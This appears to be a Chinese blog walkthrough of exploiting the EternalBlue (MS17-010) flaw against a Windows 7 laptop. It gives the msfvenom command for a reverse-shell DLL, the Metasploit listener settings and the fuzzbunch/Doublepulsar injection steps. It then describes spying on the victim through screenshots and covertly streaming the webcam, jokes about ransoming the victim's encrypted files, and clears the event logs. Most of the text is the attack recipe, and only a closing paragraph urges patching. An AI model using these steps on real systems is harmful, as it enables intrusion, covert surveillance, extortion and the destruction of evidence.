关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用
需要三台电脑
一台windows7 正版 sp1(没有更新到最新的补丁),ip:192.168.1.179,什么都不需要做,开机,知道IP就可以了
就是这个倒霉蛋我的笔记本(用了7年了)
一台用来运行攻击程序,注入dll的,因为EternalBlue需要python2.6.6,32位,以及pywin32-221,32位版本,所以攻击的电脑需要时32位的,我用的是一台windowsXP ip地址192.168.1.180
还需要一台电脑 这个是控制端,用来控制被入侵的电脑,linux系统,这个还有个功能就是使用msf生成攻击负载,msf是什么就不说了,攻击入侵,杀人越货之必备良品。
首先我们要利用msfvenom生成一个负载,就是一个木马了,帮我们干活的东西,我要在64位的电脑上运行木马,所以生成木马的命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=5555 -f dll > /root/dll/systemSet.dll
三个地方 一个就是控制端的地址,一个是使用的端口,一个是生成文件的存放位置。哦 还有就是 模块,用于64位的windows
生成后,将dll文件拷贝到攻击用电脑上完了就是利用EternalBlue攻击受害系统,成功后使用Doublepulsa将刚刚生成的木马,远程,人不知,鬼不觉的注入到受害系统上去,从控制机上控制受害机。
接着在msf下开启msfpaylod监听等着被控制端上线。
$ msfconsole,开启msfconsole,看看这是不是很帅,很帅
接下来设置开启监听
msf > useexploit/multi/handler
msf > set LHOST 192.168.1.41
msf > set LPORT 5555
msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit
等着倒霉蛋上钩吧
接下来就是重头戏了,在安装好环境的攻击机上复制好NSA的超牛工具,执行windows目录下的fb.py,源文件要修改下,注释掉26、27、28、72四行。
需要设置的有攻击IP地址192.168.1.179(受害者),回调地址192.168.1.180(攻击机),关闭重定向,设置日志路径,新建或选择一个project其他都是默认值回车即可。
接下来输入命令开启永恒之蓝开始攻击:
use ETERNALBLUE
依次填入相关参数,超时时间等默认参数可以直接回车,需要注意的就是,选择被攻击方的操作系统目标系统信息,以及攻击模式选择FB
看到 这个 Eternalblue Succeeded,攻击完成
接下来开始使用Doublepulsar,把刚刚生成的木马注入到受害系统中去
use Doublepulsar
一路回车,需要注意的就是选择目标操作系统架构,系统后门的执行方式选择Rundll
填写刚刚生成的那个木马dll文件的地址
这个是填写你要注入的进程,默认是lsass.exe 默认就是最好的,直接回车
看到这个吗?Doublepulsar Succeeded ,已经成功把dll木马注入到受操控的系统中。攻击机的使命到此结束
返回到控制机,看看倒霉蛋已经上线了
再看看倒霉蛋,还是浑然不觉,很正常的在运行。
接下来,先用sysinfo看看倒霉蛋的信息,使用webcam_list 看看被控制的电脑有没有摄像头,routes查看路由表
这个screenshot,就是截取被控制端电脑的屏幕看看
这个就是截取到的图片
这个是打开被控制端的摄像头,拍一张图片
这个就是摄像头拍到的图片
下面这个就是开启摄像头直播,把摄像头拍摄的数据流传送回来,直接直播,哈哈哈
这个就是直播呢
shell,获取被控制系统的shell,就是像在你电脑上运行cmd一样,啥命令都可以执行,最高权限,被控制端上没有任何的提示。可以cmd rar 把被控制端上看着有用的文件给加密压缩了,哈哈,完了留个消息,给钱给密码,不给钱,你也打不开文件,哈哈 想哭 就是这么干的……
dir下被控制端的c盘有哪些文件
能做到很多呢,上传,下载文件,执行文件 等等等 没有做不到,只有想不到…… msf是不是很牛。
玩完了,记得清理掉痕迹,清理被控制端的日志
clearev
这个是不是很恐怖,所以,安全很重要,系统要用正版的,倒不至于去买正版,但是最起码要安装原版,完了各种办法去激活想正式版一样的享受升级,补丁……,万万不可用各种系统ghost,确实很快,很快,但是也很危险 很危险,想想这个远程控制你需要漏洞,需要好的攻击工具,很麻烦,如果把木马提前放到ghost映像里面,你安装直接就在系统了,直接控制根本不需要什么攻击和漏洞,看看这次大规模爆发,校园首当其冲,再有就是网络比较大的单位,一是他们是局域网,正中,还有一个原因就是他们的操作系统多数都是30块在大街上ghost的,或者小铺ghost的,微软早在3月14日就发布了ms17-010漏洞的补丁,ETERNALBLUE是在4月14日才释放出来,要不是wannacry大规模爆发,根本不会关注这个漏洞,不会去下载补丁。
关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用相关推荐
- Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN
Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN 一.原理 1.Eternalblue可以利用SMB漏洞,结合Doublepulsar ...
- 【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】
MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6 文章目录 MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-01 ...
- EternalBlue 永恒之蓝 SMB 漏洞底层实现介绍
EternalBlue 永恒之蓝 SMB 漏洞底层实现介绍 EternalBlue 永恒之蓝 是 Windows 8 之前的系统中存在的漏洞,它支持 SMB 服务中的进程间通信共享(IPC$),默认允 ...
- EternalBlue永恒之蓝漏洞(MS17-010)复现
测试环境 靶机: Windows7 IP:192.168.5.90 开放445端口 关闭防火墙 攻击机:Windows10/kali IP:19 ...
- 网络安全攻击手段之永恒之蓝【MS17_010】利用及漏洞剖析
声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险!!! 永恒之蓝利用方法 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子 ...
- 微软EternalBlue永恒之蓝漏洞攻击测试
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/7939 ...
- EternalBlue永恒之蓝ms17_010使用
实验环境:VM Ware15;Kali Liunx;Windows Sercer 2008 R2 攻击思路: 1.扫描靶机msf5 > use auxiliary/scanner/smb/smb ...
- NSA武器库之永恒之蓝、浪漫、冠军复现
https://www.zhihu.com/question/59783043 https://www.freebuf.com/articles/system/135270.html?replytoc ...
- 永恒之蓝(EternalBlue)实例复现
一.前言 2017年4月的时候,Shadow broker在网络上公布一批NSA(美国国家安全局)使用的网络武器,其中就包含一种工具,可以远程控制有漏洞的任何一台windows机器,正是这些工具的问世 ...
最新文章
- 李进良/丁守谦:希望TD-LTE成为4G的统一标准
- python导入xlsx文件-python怎么用pd导入xlsx
- 使用组策略禁用注册表编辑工具
- jmeter 取json值_干货丨实战经验分析,带你走进Jmeter参数化
- 上海广电电气集团选用Ultimus 提升企业管理
- 5.2.3 OS之I/O设备的分配与回收(DCT-COCT-CHCT-SDT)
- svn强制要求提交注释
- 知识图谱论文阅读(二十三)【SIGIR2020】Multi-behavior Recommendation with Graph Convolutional Networks
- log4j.dtd_Eclipse log4j.xml –无法将log4j.dtd验证为XML定义
- 【读书笔记《Android游戏编程之从零开始》】18.游戏开发基础(碰撞检测)
- CSS的BEM命名规范
- “逃离”北京来到二线城市,谈谈面试和职业规划
- 【论文】Track to Detect and Segment: An Online Multi-Object Tracker
- 基因家族特征分析 - 染色体定位分析
- 【Vivado】 [Place 30-574] 时钟使用普通IO时的报错解决办法
- JAVA核心:I/O(输入/输出)
- OpenCV - 计算相机和视频的帧速率FPS
- java如何继承两个类?以及讨论一下多继承的利弊。
- 2021年专插本计算机专业分数线预估,【参考】2016-2020年专插本省最低录取控制线预估2021年最低录取分数线是多少...
- 图标icon,图标icon资源
热门文章
- C++ 中的容器类详解
- 适用于低功耗无磁水表方案的32位MCU
- 出租屋里诞生的互联网独角兽,他让公司成为了互联网行业的领军者
- UVa 12086 - Potentiometers
- 【EPC】赛事竞猜上线后大涨50%,若风、Miss投资的电竞链实现商业化落地
- ReactNative和微信应用号小程序之间的分析异同全平台开发
- 点击网页上的手机号码直接拨打电话(针对手机端)
- 主流 EDI 标准都有哪些?
- s:form action=user!regist method=post
- openshift单机版安装